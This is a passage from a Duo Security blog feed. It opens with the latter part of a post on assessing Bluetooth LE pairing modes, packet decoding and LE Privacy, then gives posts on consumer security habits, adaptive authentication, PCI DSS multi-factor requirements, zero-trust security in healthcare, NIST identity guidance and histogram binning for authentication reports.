In phase two, the purpose is to generate a Short Term Key (STK). This is done by the devices agreeing on a Temporary Key (TK) and mixing it with some random numbers, which gives them the STK. The STK itself is never transmitted between devices. Pairing with an STK is commonly known as LE legacy pairing. However, if Secure Connection Only Mode is being used, a Long Term Key (LTK) is generated in this phase (instead of an STK), and this is known as LE Secure Connections.

Phase Three

In phase three, the key from phase two is used to distribute the rest of the keys needed for communications. If an LTK wasn’t generated in phase two, one is generated in phase three. Data like the Connection Signature Resolving Key (CSRK) for data signing and the Identity Resolving Key (IRK) for private MAC address generation and lookup are generated in this phase.

There are four different pairing methods:

  • Numeric Comparison. Basically, both devices display the same six-digit value on their respective screens or LCD displays, and you make sure they match and hit or click the appropriate button on each device. This is not to prevent a man-in-the-middle (MITM) attack, mainly because it doesn’t, but rather to identify the devices to each other.
  • Just Works. Obviously, not all devices have a display, such as headphones or a speaker. Therefore, the Just Works method is probably the most popular one. Technically, it is the same as Numeric Comparison, but the six-digit value is set to all zeros. While Numeric Comparison requires some on-the-fly math if you are performing a MITM attack, there is no MITM protection with Just Works.
  • Passkey Entry. With Passkey Entry, a six-digit value is displayed on one device, and this is entered into the other device.
  • Out Of Band (OOB). The pairing information is exchanged over a communication method outside of the Bluetooth channel, and the information is still secured. The Apple Watch is a good example of this workflow. During the Apple Watch pairing method, a swirling display of dots is displayed on the watch face, and you point the pairing iPhone’s camera at the watch face while (according to Apple) bits of information are transmitted via this process. Another example is using Near Field Communication (NFC) between NFC-capable headphones and a pairing phone.

Determining Modes and Levels

As mentioned before, the Layer-7 application is not aware of the underlying Bluetooth security implementation. Therefore, reversing an app used for some Bluetooth-enabled device will not tell you the full story. Nevertheless, there are several steps you can take to determine the security modes and levels for a device.

Initiator or receiver. Determine if the device is an initiator or a receiver. In modern Bluetooth terms, it will fall into the rough categories of Bluetooth Smart or Bluetooth Smart Ready. Think of it this way: a device that initiates the Bluetooth connection during initial pairing is going to be the Bluetooth Smart Ready device. The device being paired to is going to be the Bluetooth Smart device. You will then have to prove if they are in fact Smart or Smart Ready, but knowing which is which will help determine what packets you will need to look at on a sniffer trace. Some tools will list this as Master or Slave, or some other set of terms denoting roles.

If the device you are exploring is a Bluetooth Smart receiver, you can possibly initiate the pairing from your Bluetooth Smart Ready laptop and sniff using the laptop’s Bluetooth interface as the source of your sniffing in Wireshark. See our blog post comparing hacking tools for more details.

Instructions for pairing. When you get your new Bluetooth-enabled device, it will typically include instructions for pairing. Obviously, if the devices have screens that can display a value and you can observe that Numeric Comparison or Passkey Entry is used, great. If OOB is used, even better, as this is the most secure pairing method. In these cases, you know modern implementations of Bluetooth security are at least supported. If you see pairing instructions that include something like “if asked for a passcode, use xxxx” where xxxx is a four-digit value, then you know Bluetooth 2.0 legacy authentication is supported, and virtually all other modern security elements are most likely not implemented.

However, most pairing involves Just Works, simply because there is no screen on many devices in the Bluetooth Smart category. If Bluetooth 2.0 legacy authentication is not supported, it does not mean additional security elements are implemented, but it helps steer further exploration.

Scanning and probing. Scanning a device with a Bluetooth scanner can help determine security levels. Any information you can get from the scans, including information on the chipset involved, will help greatly. If you can determine the chipset in use, you can look up what the chipset is capable of (e.g., “it can handle up to eight connections and has AES-128 support onboard”). If the chipset “supports the latest features of Bluetooth 3.0,” then you know advanced security is not a part of the equation.

Note the MAC address. If the address is a public address and the OUI is in the OUI database with the IoT vendor’s name associated with it, they are not using LE Privacy - they are using a constant MAC address at all times. You can verify this over time via further scans and probes, as the MAC address will remain the same.

If you can connect to the device for probing but any action seems to kick you right back out, most likely Secure Connection Only Mode is in place.

Sniffing the pairing. Detecting the implementation of security elements via a Bluetooth sniffer might seem extremely hard, but once you understand what the different security modes are and how they are used, you can easily determine what has been implemented - assuming you get a successful sniffer trace.

Ideally, you want to capture a sniffer trace of the pairing process. If you are examining the initiator or Bluetooth Smart Ready device, you want the Pairing Request packet. Conversely, if you are examining the receiver or Bluetooth Smart device, you want the Pairing Reply packet.

Bluetooth Security Manager Protocol

The opcode will be 0x01 for a Pairing Request and 0x02 for a Pairing Reply. I/O capability will be one of the following:

  • 0x00 Display Only
  • 0x01 Display Yes/No (both a display and a way to designate yes or no)
  • 0x02 Keyboard Only
  • 0x03 No Input/No Output (e.g. headphones)
  • 0x04 Keyboard Display (both a keyboard and a display screen)
  • 0x05-0xFF Reserved

OOB Data Flag will be 0x00 for no OOB data or 0x01 for OOB data present. Max Encryption Key Size gives the size of the encryption key in octets, and the Initiator and Responder Key Distribution bytes use flags to convey which keys will be distributed.
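
If you want to double-check what a sniffer shows you, the fixed seven-byte layout of these packets is easy to pick apart by hand. A minimal sketch of that decoding (the field layout follows the description above; the dictionary of labels is just for readability):

    # Sketch: decode the seven fixed bytes of an SMP Pairing Request/Reply.
    IO_CAPS = {0x00: "Display Only", 0x01: "Display Yes/No", 0x02: "Keyboard Only",
               0x03: "No Input/No Output", 0x04: "Keyboard Display"}

    def parse_pairing_packet(payload: bytes) -> dict:
        opcode, io_cap, oob, auth_req, max_key, init_dist, resp_dist = payload[:7]
        return {
            "opcode": {0x01: "Pairing Request", 0x02: "Pairing Reply"}.get(opcode, hex(opcode)),
            "io_capability": IO_CAPS.get(io_cap, "Reserved"),
            "oob_data_present": bool(oob),
            "auth_req": auth_req,                # decoded bit by bit below
            "max_enc_key_size_octets": max_key,
            "initiator_key_dist": init_dist,
            "responder_key_dist": resp_dist,
        }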

The Auth Request byte consists of five fields, and uses the various bits as flags. From least significant bit to most significant bit, here are the fields (a short decoding sketch follows the list):

  • Bonding flags, two bits. Only the least significant bit is used; the other bit is reserved. A value of 0 means no bonding, and 1 means bonding. If bonding is used, an LTK will be exchanged, which means the two devices can be paired, and a reboot or sleep mode will not unpair them. If encryption is supported, this will happen separately after pairing.
  • MITM flag, one bit, 0 is that MITM protection is not requested, and 1 is that MITM protection is requested.
  • Secure connection, one bit. If this is set to 1, the device is requesting to do Secure Connection Only Mode, otherwise it is set to 0.
  • Keypress flag, one bit. If set to 1 it means Passkey Entry needs to be used, otherwise it is ignored.
  • The last three bits are reserved.
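
Here is the decoding sketch mentioned above; the example value 0x0d is the one discussed in the Apple Watch capture below:

    # Sketch: pull the individual flags out of the AuthReq byte.
    def decode_auth_req(auth_req: int) -> dict:
        return {
            "bonding": bool(auth_req & 0b00001),             # bits 0-1; only bit 0 used
            "mitm_protection": bool(auth_req & 0b00100),     # bit 2
            "secure_connections": bool(auth_req & 0b01000),  # bit 3
            "keypress": bool(auth_req & 0b10000),            # bit 4; bits 5-7 reserved
        }

    # 0x0d decodes to bonding + MITM + Secure Connections, with keypress clear.
    print(decode_auth_req(0x0d))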

Remember though, always check your tools and do not rely on what they tell you - get multiple examples of the same process to help ensure you are sniffing the data accurately. And don’t expect every manufacturer to follow the rules as you might interpret them. Here is a Pairing Reply packet during a pairing of an Apple Watch with an iPhone using the Passkey Entry process that illustrates this perfectly:

Figure 2. Wireshark interpretation of an Apple Watch pairing reply packet. Note the AuthReq section doesn’t match the raw data.

In Figure 2, the main issue is that byte 24’s (offset 0x17) value is 0x0d. Under the Wireshark interpretation, only the bits for Bonding and MITM are set, while the value of 0x0d indicates the Secure Connection bit is also set. At the time of the sniffer trace, the Passkey Entry method was chosen, but neither the Wireshark interpretation nor the raw data shows the Keypress bit as set.

It should be noted that using Secure Connection Only Mode implies using either Passkey Entry or OOB as the pairing method. Since OOB is not explicitly set, the default would be Passkey Entry. This is in spite of the fact that the Keypress bit is not set.

This means one of two things: 1) since Secure Connection Only Mode was being used, Apple felt there was no reason to set the Keypress bit since it would be implied, or 2) there will be no pressing of a key on the Apple Watch side, since during Apple’s implementation of Passkey Entry no keypress is needed from the watch. My guess is the latter. During its Pairing Request packet, the iPhone did say that it can do 0x04 (Keyboard Display - both a display screen and a keyboard for input), so when you consider everything the two devices are claiming they can do in the conversation, they can handle Passkey Entry.

Overall though, during the pairing process the Apple Watch is claiming its I/O Capability is 0x00 which is Display Only, despite the fact that the Apple Watch can do a Display Screen and Keyboard input. It is specifically limiting itself during the pairing process to match what is being requested by the user, who is controlling the pairing choice. There is nothing in the specification about adjusting things to user preference or settings, although it makes sense, especially from a security perspective, to limit the amount of exposure.

This is the level of scrutiny one needs when looking at Bluetooth to either prove or disprove an action or setting. In a report or blog post on the Apple Watch, I might have simply worded this as “the Apple Watch follows the Bluetooth specification for 4.2 during the pairing process” instead of showing this level of detail. But at least you can make the statement firmly.

LE Privacy

Whenever a Bluetooth device needs to transmit, it enters an advertising mode where it announces to the world it is there. Depending upon the nature of the device, it could do this only periodically, or it could be doing this constantly. It uses a MAC address during advertising so that other devices can potentially talk back to it.

One of the issues with this scenario is that a nefarious person could track an individual’s movements by tracking where that MAC address pops up. Therefore, it makes sense that a device trying to protect its owner from tracking would periodically change its MAC address. Naturally, this creates other problems. How will the paired devices know what they are paired to if the address keeps changing? How can I limit the knowledge of my MAC address to only devices I trust, while still protecting myself from being tracked?

This is where LE Privacy comes in. This solution was introduced with the creation of Bluetooth Smart (the 4.0 standard), and it is an efficient solution for the problem. During the pairing process in phase three (as outlined above), the devices exchange a variety of keys. One of those keys is the Identity Resolving Key (IRK). This key allows for the creation and resolution of random MAC addresses to be used in advertising packets.

Basically, the device’s real MAC address isn’t changed - only the address reported via the advertising packet is. By providing an IRK to a device’s paired partner, you are telling that partner how to “resolve” a MAC address to recognize the device later based on its random advertising address. To help ensure the devices reconnect, the LE Privacy device will create an advertising packet with the destination MAC address of its paired partner and the random MAC address as the source - the paired partner knows to resolve the MAC address quickly to determine who it is, as it might be paired to multiple devices that use LE Privacy.
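
Under the hood, the random address is a resolvable private address: 24 bits of random data (prand) plus a 24-bit hash computed over that prand with the IRK and AES-128. A partner holding the IRK just recomputes the hash and compares. A rough sketch of that check (byte ordering simplified to big-endian; captures on the wire are little-endian):

    # Sketch: resolve a BLE resolvable private address (RPA) using an IRK.
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def ah(irk: bytes, prand: bytes) -> bytes:
        """Random address hash: AES-128(IRK, zero padding || prand), low 24 bits."""
        block = b"\x00" * 13 + prand  # pad the 3-byte prand out to a 16-byte block
        enc = Cipher(algorithms.AES(irk), modes.ECB()).encryptor()
        return (enc.update(block) + enc.finalize())[-3:]

    def resolves(rpa: bytes, irk: bytes) -> bool:
        prand, hash_part = rpa[:3], rpa[3:]  # 48-bit address = prand || hash
        return ah(irk, prand) == hash_part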

This provides a nice way for two devices to remain paired even with interruptions due to sleep mode, power cycling, or physical distance between the devices being greater than the Bluetooth range - and it still helps ensure user privacy by preventing tracking by MAC address.

LE Privacy is extremely easy to spot in a lab environment: you simply scan for MAC addresses and track them over time. Performing actions on the LE Privacy device that generate traffic makes it easier to spot. The time delay will vary, and it is entirely up to the manufacturer to decide the intervals between cycles. I’ve personally seen anywhere from 15 to 30 minutes, and most devices that implement LE Privacy also use a fresh MAC address after every power cycle.
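
The bookkeeping for that kind of tracking is trivial; a sketch is below, with scan_once() standing in for whatever scanner output you have (that helper is hypothetical, not a real library call):

    # Sketch: log advertising addresses over time to spot LE Privacy in use.
    import time

    def scan_once() -> set:
        """Hypothetical placeholder: wire this up to your BLE scanner and
        return the set of advertising MAC addresses seen in one pass."""
        return set()

    first_seen, last_seen = {}, {}
    while True:
        now = time.time()
        for addr in scan_once():
            first_seen.setdefault(addr, now)
            last_seen[addr] = now
        # Addresses that show up, live for roughly 15-30 minutes and never
        # return are a strong hint the device is cycling random addresses.
        time.sleep(60)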

Where’s the Code?

As mentioned, this type of exploration isn’t your typical “APK decompile to get to the code that controls the Bluetooth choices” workflow, since the code for the Bluetooth stack is located in the device’s firmware or in a device driver. If it is in firmware, this can be quite complex to get to, as we’ve seen before.

Summary

Bluetooth security can be complex, but once you do a bit of sniffing and poking around in a device’s security settings (if they exist) you can learn a lot. Even by simply studying behavior, documents, and how devices interact, you can usually figure out not only what a device is capable of from a security perspective, but how much security has actually been turned on.

]]>
<![CDATA[The Current State of Consumer Security Hygiene]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/the-current-state-of-consumer-security-hygiene https://duo.com/blog/the-current-state-of-consumer-security-hygiene Industry News Thu, 04 Jan 2018 01:00:00 -0500

Consumers need to work on their basic security hygiene, according to a Tenable consumer survey of 2,196 U.S. adults and their personal security practices. Generally, they found that the majority are lacking in their security habits - most don't use two-factor authentication (2FA) and some are not updating their devices in a timely manner. However, nearly all (94%) have heard news stories about security breaches in the last year.

But why should businesses care? Consumers are also employees that are increasingly using their own personal devices to access work applications, data and other resources in order to work flexible hours and from locations outside of the traditional workplace. A lapse in their personal security habits can potentially have a ripple or direct effect on corporate security.

A few of the interesting statistics about consumer security habits from their survey include:

  • 25% of participants have implemented two-factor authentication on their devices to protect personal information in the past year (which is closely aligned with Duo Labs’ survey finding of only 28% of Americans that use 2FA in their State of the Auth report)
  • 68% avoid opening links and attachments from unsolicited emails or texts
  • 53% of Americans use a password to lock their computer and 45% use a PIN passcode to lock their mobile devices
  • 19% have implemented biometric authentication on their devices in the past year, despite Apple introducing Touch ID in 2013 and facial recognition technology more recently
  • 14% of smartphone users wait more than a week (or never) to update apps on their smartphone, and another 13% of computer users wait more than a week to update - as well as 5% that don’t update computer apps at all

These habits all center around authentication, access security and device/endpoint security. As network security shifts from a perimeter-based approach to the more challenging user and endpoint-focused approach, consumer and enterprise security must also follow.

Consumers should turn on 2FA everywhere it’s offered and available for implementation - Twitter recently offered the use of third-party authentication apps to generate passcodes (generally considered more secure than SMS) for login verification. Some online banking websites offer advanced authentication, while major online shopping services like Amazon also offer 2FA. iCloud users can and should turn on 2FA to protect access to their device data and cloud backups.

Enterprises can step up access security by enabling more stringent controls for access to more business-critical or sensitive applications and data - for example, requiring the 2FA method of push notifications or a U2F security key for access to applications that house HR or financial data. Identifying and applying different security policies for corporate-owned vs. personal devices can also help reduce risks introduced to company resources.

Another example of an enterprise access security policy is the requirement for a PIN or password on your employee’s personal device - a security basic that only about half of the survey respondents currently practice.

When it comes to updating apps, mobile devices and computers, it’s important to install updates as soon as they become available - within 24 hours of receiving a notification. Enterprises can set another endpoint policy to require users to be running the latest version of a browser, plugin or application before granting them access to company resources/networks.

Get the basics behind this policy-driven security model, including:

  • Identifying corporate vs. personal devices
  • Easily deploying device certificates
  • Blocking untrusted endpoints
  • Giving users secure access to internal applications

Download Moving Beyond the Perimeter: Part 1 for a primer on the theory, and then read Moving Beyond the Perimeter: Part 2 for technical specifics on how to implement a new enterprise architecture to address new risks beyond the perimeter.

]]>
<![CDATA[Managing Risk With Adaptive Authentication]]> wnather@duo.com(Wendy Nather) https://duo.com/blog/managing-risk-with-adaptive-authentication https://duo.com/blog/managing-risk-with-adaptive-authentication Industry News Wed, 03 Jan 2018 08:30:00 -0500

The problem with authentication is that one factor doesn’t fit all — in fact, it hardly fits anything anymore. With a password being guessable and reusable, it’s a weak security control that can be attacked at scale. Adding a second factor to the mix bolsters that control, but it also starts adding friction to the login experience. CISOs now have to balance managing risk with multiple authentication factors against usability, and that’s where adaptive authentication comes in.

If you think of authentication factors as being like a hand of cards, you can play the cards that you think are appropriate at each point in your game. The most common factors are:

  • Something you know (such as a password, or something in your personal history, or a shared secret)
  • Something you have (a token, card, certificate, key, app instance, or other unique item)
  • Something you are (a fingerprint, a typing behavior, a retinal pattern, a voiceprint)

There’s also the option to allow more than one factor in each category. Theoretically, it should be harder for an attacker to compromise an account as the factors get piled on. This is why challenge questions may be as few as one and as many as five, depending on how likely they are to be guessable. The “thing you have” may consist of a mobile phone, a certificate, a voice line, a U2F token, a set of offline codes, or all of the above.

To get even more factors into the mix, you can lay down additional restrictions in your policies, such as permitted network address ranges, device hygiene levels, allowed or blocked geographic locations, corporate-managed endpoints, expected usage hours in a day, and baselined behavior.

You can use anything that reassures you that this is probably the same user you enrolled, or that excludes anything you don’t expect ever to see. For example, if you don’t expect your users to connect from outside of North America, you can reduce your potential attack surface by blocking access from everywhere else. (But be ready to manage exceptions to that rule, because for each policy, there will be an equal and opposite exception).

Note, however: if you rely too much on location as a factor, then you fall into the perimeter trap that has affected so many enterprises, where an attacker has free rein on an internal network once they’re past the firewall.

When you have reason to doubt one of the factors — is someone else replaying that password? Did someone steal the phone? — then you lean more heavily on another factor to compensate. You ask for some additional secret information, or you ask the user to produce a fingerprint. By juggling different factors to rebalance the risk, you’re employing adaptive authentication: adapting to the current estimated level of risk at the time of login.

Which cards you play might depend on whether it’s early or late in the game, what cards have already been played, or what you think the house is holding. Is this a new device? Ask the user to enroll it, providing more shared-secret factors such as a code that the help desk gives them over the phone, or by sending a confirmation to the old device, or by having the user authenticate to a different application first. With adaptive authentication, you’ve developed a strategy for each circumstance, or use case, to match the risk level you assume.
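
As a toy illustration of that strategy (every signal, threshold and factor name here is invented for the example, not taken from any particular product), a policy check might look something like this:

    # Sketch: choose authentication requirements from contextual risk signals.
    # All field names and rules below are hypothetical examples.
    from dataclasses import dataclass

    @dataclass
    class LoginContext:
        country: str
        device_known: bool      # have we seen this device before?
        device_managed: bool    # corporate-managed endpoint?
        new_location: bool      # login from a place we haven't seen?

    def required_factors(ctx: LoginContext) -> list:
        if ctx.country not in {"US", "CA", "MX"}:
            return ["block"]                       # outside the expected region
        factors = ["password"]
        if not ctx.device_known or ctx.new_location:
            factors.append("push_or_u2f")          # step up when something looks new
        if not ctx.device_managed:
            factors.append("device_health_check")  # unmanaged endpoint, check hygiene
        return factors

    print(required_factors(LoginContext("US", device_known=True,
                                        device_managed=False, new_location=True)))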

Because usability comes into play, there are also several reasons why you might adapt your authentication factors. A user currently in an area with little-to-no cell coverage might have to fall back on Wi-Fi or a token; it’s hard to use a fingerprint reader when you’re having tacos or ribs for lunch.

As mentioned above, more factors mean more friction, so another popular feature in many systems allows you to “remember” a user or a device and stop asking for the additional authentication factor over a period of time (say, a multi-hour session, or calendar days or weeks). Again, by adding or removing the requirement for certain factors under different circumstances, you can adapt the cards you play or keep. You need to keep your users happy and, at the same time, protect against the most likely threats.

Adaptive authentication helps you choose the right tools for the job at the time, without locking you and the user into one set of factors for everything. By taking advantage of flexibility, understanding the risk with different workflows and circumstances, and reducing friction in the login process for your users, you can achieve the right balance of controls. Knowing when to hold ‘em and when to fold ‘em is an important part of your dynamic security program.

]]>
<![CDATA[Using Duo's MFA to Protect Remote Access for PCI DSS Compliance]]> ubarman@duosecurity.com(Umang Barman) https://duo.com/blog/using-duos-mfa-to-protect-remote-access-for-pci-dss-compliance https://duo.com/blog/using-duos-mfa-to-protect-remote-access-for-pci-dss-compliance Industry News Tue, 19 Dec 2017 08:30:00 -0500

The Payment Card Industry Data Security Standard (PCI DSS) is a set of security standards established to secure credit card data. At this time, PCI DSS is in its third revision with the latest version 3.2 published in 2016. All organizations that are required to be PCI compliant will need to meet all updated requirements in v3.2. The specific multi-factor authentication (MFA) requirements in PCI v3.2 will go into enforcement starting Feb 1, 2018.

In v3.2, PCI DSS put a greater emphasis on the use of multi-factor authentication as a security control to tackle data breaches due to stolen credentials. For example, in previous revisions, MFA was a required control only for admin console access into the cardholder data environment (CDE).

In its latest revision, PCI extends MFA as a required control for all remote access (console and non-console) into the cardholder environment. Remote access application examples include virtual private network (VPN), virtual desktop infrastructure (VDI), remote desktop (RDP), Secure Shell (SSH) etc. In addition, PCI also published several supporting documents to help organizations deploy MFA in a compliant manner.

Organizations that need to meet PCI requirements can refer to official documents; however, official requirements can be nuanced and open to interpretation. At Duo, several of our customers asked us for clarification regarding PCI requirements. In order to address their concerns, Duo engaged with Payments Security Compliance (PSC), part of NCC Group, to write a white paper that describes how MFA requirements can be implemented in a compliant manner.

PSC helps thousands of organizations, guiding them through PCI compliance requirements. The white paper is written by Paul Guthrie, who has deep experience in the PCI domain. Paul has over 20 years of payments and security expertise, and is a practicing Qualified Security Assessor (QSA) with over 200 Level 1 assessments completed.

PSC evaluated Duo against the existing PCI requirements in v3.2 and found Duo is able to meet all of its MFA requirements. In addition, this white paper also describes best practices and scenarios to implement MFA in your PCI environment to both meet compliance and ensure remote access to your network is secured. If you want to get access to the white paper, please get in touch with your account executive.

If you are interested in deploying MFA to help meet PCI requirements, you can start your free 30-day Duo trial by visiting signup.duo.com.

]]>
<![CDATA[Future-Proofing the Healthcare Security Model]]> dcopley@duo.com(Doug Copley) https://duo.com/blog/future-proofing-the-healthcare-security-model https://duo.com/blog/future-proofing-the-healthcare-security-model Industry News Mon, 18 Dec 2017 08:30:00 -0500

Challenges of Securing Healthcare

Challenges today come in all shapes and sizes. The threat landscape in 2017 is vastly different than it was just 10 years ago. Technology capabilities, the workforce and speed to market are also vastly different than they were 10 years ago. So why do so many healthcare organizations approach protecting their critical assets the same way they did in 2007?

Sure, healthcare environments are challenging to secure. Rapid business changes and expectations of convenience are often at odds with efforts to manage risk and compliance. With so many data breaches occurring today and the high percentage of them leveraging compromised credentials or compromised devices, the time to change the healthcare information security model is now.

A New Approach to Enterprise Security

Many have heard Google explain their BeyondCorp security model which effectively turned their security model on its end. Google’s decision to treat all networks as untrusted drove their strategy to one of providing secure pathways to their critical assets and establishing user trust and device trust on every application access attempt. But many view Google as having effectively unlimited resources, so what’s the right path for “typical” companies with limited resources?

Does a zero-trust model even make sense in healthcare? What would it look like? Would it drive better security, enable reductions in risk and drive operational efficiency in such a challenging environment?

Transforming Healthcare Information Security

Download Duo’s white paper, Transforming Healthcare Information Security, to understand the answers to these security strategy questions and learn how to reach the positive business outcomes that will keep healthcare organizations nimble and relevant. In this white paper, you’ll learn how you can:

  • Enable workforce members to work from any location
  • Provide flexibility to leverage company-issued technology or enable the secure use of BYOD
  • Drive meaningful visibility into security risks with fewer security tools, making security staff more productive
  • Raise end user satisfaction with security tools they actually enjoy using
  • Minimize legacy infrastructure spend and dependencies
  • Secure new business applications in hours, not weeks or months; enabling departments to move faster and drive better patient outcomes

Challenges left alone turn into roadblocks. Challenges addressed with effective strategy and innovation can positively transform your business. Download the white paper, Transforming Healthcare Information Security and see how healthcare organizations can drive business agility and improve the value of their security program by adopting a zero-trust security model.

]]>
<![CDATA[NIST Updates to Identity Management: Evolved MFA for the Masses]]> thu@duosecurity.com(Thu Pham) https://duo.com/blog/nist-updates-to-identity-management-evolved-mfa-for-the-masses https://duo.com/blog/nist-updates-to-identity-management-evolved-mfa-for-the-masses Industry News Tue, 12 Dec 2017 08:30:00 -0500

Recently, NIST published their second draft of the proposed update to the Framework for Improving Critical Infrastructure Cybersecurity, version 1.1. NIST also published a draft version 1.1 of their Roadmap for Improving Critical Infrastructure Cybersecurity, which includes updates on the following new topics:

  • Cyber-Attack Lifecycle;
  • Measuring Cybersecurity;
  • Referencing Techniques;
  • Small Business Awareness and Resources; and
  • Governance and Enterprise Risk Management.

One key part of the changes made in the Roadmap document is the renaming of the topic Authentication to Identity Management “to account for a broader range of important technical topics including authorization and identity proofing.”

Since the first release of the Framework, there have been advancements in Identity Management solutions, as outlined in section 4.7 of the Roadmap. NIST points to new multi-factor authentication (MFA) solutions and authentication protocols as examples of industry maturation, such as those established by Fast IDentity Online (FIDO) and the World Wide Web Consortium (W3C).

FIDO’s open authentication standard, Universal 2nd Factor (U2F) uses public key cryptography to securely authenticate a user to a web service, protecting against phishing and providing strong user-centric privacy, as a U2F device is not bound to a user’s real identity - read more about it in Bringing U2F to the Masses.

This second factor comes in the form of a U2F-compliant security key (like Yubikey Neo), a small USB device plugged into your laptop that you tap to complete two-factor authentication. See how it works below:

 

Specifically, NIST emphasizes how these protocols and solutions “will bring easy-to-use and cost-effective MFA solutions to the consumer masses, with support by nearly every major browser and mobile manufacturer.”

While use and adoption is advancing in the right direction, it’s still not enough to protect against cybersecurity threats - NIST cited the 2017 Verizon Data Breach Report’s statistic that 81 percent of hacking-related breaches leveraged stolen and/or weak passwords as an example of this.

To help better align technology and risk management processes, and provide guidance on digital identity guidelines, NIST has updated its Special Publication 800-63 suite of documents this past July. Get an overview of those substantial updates in Key Updates to NIST’s Digital Identity Guidelines: SP 800-63-3.

As threats and risks continue to evolve, a static approach to identity no longer suffices. Identity management needs to become more risk-aligned, adaptive, and contextual with guidance capable of supporting flexibility, modularity, and agility – while never sacrificing personal privacy to achieve better outcomes. - NIST

More contextual and adaptive identity management means more than just MFA alone - a more holistic enterprise security solution was developed by Google to ensure zero trust within their internal networks, and to address threats that exist beyond traditional perimeter protections.

That model is known as BeyondCorp, and is based on verifying the trust of both users and devices before granting access to enterprise applications and data.

While it does take a lot of effort to establish a new security framework, Duo Beyond has packaged the main components of BeyondCorp and made it easy for organizations to adopt:

  • Enroll your users and endpoints (devices like laptops, smartphones, PCs, etc.) into inventories
  • Identify endpoints as trusted using digital certificates
  • Create access policies based on the authenticated combination of user and endpoint

[Image: Duo Beyond/BeyondCorp steps]

And more - learn about how to implement BeyondCorp principles in your organization by reading the white paper, Moving Beyond the Perimeter: Part 2.

]]>
<![CDATA[Developing a Solution to Dynamic Binning for Security Reports]]> jdoppke@duo.com(Jeff Doppke) https://duo.com/blog/developing-a-solution-to-dynamic-binning-for-security-reports https://duo.com/blog/developing-a-solution-to-dynamic-binning-for-security-reports Engineering Mon, 11 Dec 2017 08:30:00 -0500

While developing Duo’s new reporting features, we wanted to make it easier for our customers to visualize authentications over time. This visualization allows customers to see trends over time and spot troublesome or suspicious authentications.

Authentication Visualization

The visualization we use is a basic histogram showing the number of authentications in a given time period. When displaying the last 24 hours of authentications, we show roughly 96 15-minute-wide bins that contain the authentications that fall within each of those bins.

The Requirements

The visualization started out with a finite set of relative time ranges (e.g. the last 24 hours or 7 days). Eventually, the interface evolved to allow users to specify custom time ranges.

There were several interesting challenges that arose with custom time ranges, specifically around how the data should be visualized and binned.

In short, here are the requirements:

  • Display as close to 90 bins as possible for any given time range. Knowing this, it is pretty simple to figure out the exact interval size (time_range/90 = interval_size), but it’s the following constraints that make things a little tricky.
  • Round the beginning and end of the specified time range to the calculated interval. For example, if the user specified their start time at 1:47am and the auto-calculated interval was a 15-minute interval, round the start time down to 1:45am. The same is true for the ending time.
  • The interval that we calculated for any time range must be a valid interval for our backend storage system.
  • Control over the possible intervals in order to correctly render the x-axis.

With these requirements, there are three values we need to calculate from a start and end time:

  • The interval (15 minutes, 30 minutes, 1 hour, etc.) to bin the data
  • The rounded beginning time, rounded down to the nearest interval block.
  • The rounded end time, rounded up to the nearest interval block.

Let’s dive into how we tackled this issue!

Approaching the Problem

When developing the solution, it made sense to do so in an environment that I was comfortable in and that had a quick feedback loop. Being a frontend developer, this meant using JavaScript and D3.js. So, I put together a visual scaffolding to better help me build out and test my solution against a wide variety of time ranges and inputs. Here are a few examples:

Absolute Date and Time Inputs

[Image: absolute date and time range inputs]

Since we wanted to accept any range of time input between 24 hours and 180 days, I used range inputs that mapped to timestamps and listened to event changes on those inputs. This allowed me to quickly and easily change and test a wide variety of time ranges.

Visualizing Possible Bin Sizes

[Image: visualizing possible bin sizes]

As mentioned earlier, we have specific interval sizes we want to display. I calculate the raw interval based on the time range, but need to map this to an interval that we can pass to our datastore. The visualization above helped me see which two intervals I was choosing between as I changed the time range. In this case, the blue dot is the raw calculated bin size (time_range/90=interval_size) and the black dots are the possible intervals that our raw interval falls between.

Closest to 90 Wins

[Image: comparing bin counts - closest to 90 wins]

Knowing which two possible intervals I can choose from, I compare the bin count for the lower interval and the upper interval and check the difference from our desired bin count of 90. We pick whichever one is closer to 90 bins. You can see the highlighted bar change based on which interval is closer to our target bin count.
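
The original scaffolding was JavaScript, but the selection step ports cleanly to a few lines; here is a condensed sketch (the set of allowed intervals is illustrative, not the exact list our datastore supports):

    # Sketch: pick a bin interval that lands closest to 90 bins, then round
    # the requested range to that interval. ALLOWED is illustrative only.
    import math

    ALLOWED = [60, 300, 900, 1800, 3600, 4 * 3600, 12 * 3600, 24 * 3600]  # seconds
    TARGET_BINS = 90

    def choose_bins(start: int, end: int):
        raw = (end - start) / TARGET_BINS
        lower = max([i for i in ALLOWED if i <= raw], default=ALLOWED[0])
        upper = min([i for i in ALLOWED if i >= raw], default=ALLOWED[-1])
        # Whichever candidate yields a bin count closer to 90 wins.
        interval = min((lower, upper),
                       key=lambda i: abs((end - start) / i - TARGET_BINS))
        rounded_start = math.floor(start / interval) * interval  # round down
        rounded_end = math.ceil(end / interval) * interval       # round up
        return interval, rounded_start, rounded_end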

Seeing is Believing

[Image: calculated bins plotted on a timeline]

To double-check my outputs from the script, I plot the calculated bins on a timeline as we would in the product. Seeing this visually helps validate that I’m on the right track.

Conclusion

Here is a full animation of the scaffolding working as I developed it.

[Animation: the scaffolding in action]

Seeing the output in real-time allowed me to test a wide range of inputs quickly and easily. Once this script was finalized, it was then easily ported to Python so we could use it on our backend. This allows customers to specify arbitrary time ranges (including the relative time ranges) and view an easy-to-digest visualization of authentication over time.

This is a good example of how it can be helpful to break down a problem and approach it from a different perspective before directly coding up a solution. Having a scaffolding to interact with made this problem and solution easier to reason about and understand.

]]>
<![CDATA[The Digital Transformation Mandate]]> dcopley@duo.com(Doug Copley) https://duo.com/blog/the-digital-transformation-mandate https://duo.com/blog/the-digital-transformation-mandate Industry News Thu, 07 Dec 2017 08:30:00 -0500

According to Oracle, the number one strategic priority for CIOs is to “Lead your company’s digital transformation, don’t just facilitate it.”

We live in the information age today, and as capabilities evolve with advances in technology, communication channels and collaboration, innovation and speed are critical. Organizations are driven by consumerization and the need to put relevant data and information decisions in the hands of consumers in real time.

A hundred years ago, inventors leveraged capability from the industrial revolution to create automobiles from raw iron, wood and rubber. In today’s information age, entrepreneurs use a new set of building blocks to deliver value: information, infrastructure as a service (IaaS), microservices and open APIs that can deliver capability continuously whenever and wherever it is needed. For consumers:

  • No need to buy a newspaper - news comes to you in real time via smartphone or email
  • No need to develop a photo and mail it - it’s on social media in minutes
  • No need for a Wealth Advisor; a robo-adviser is waiting to provide you with guidance
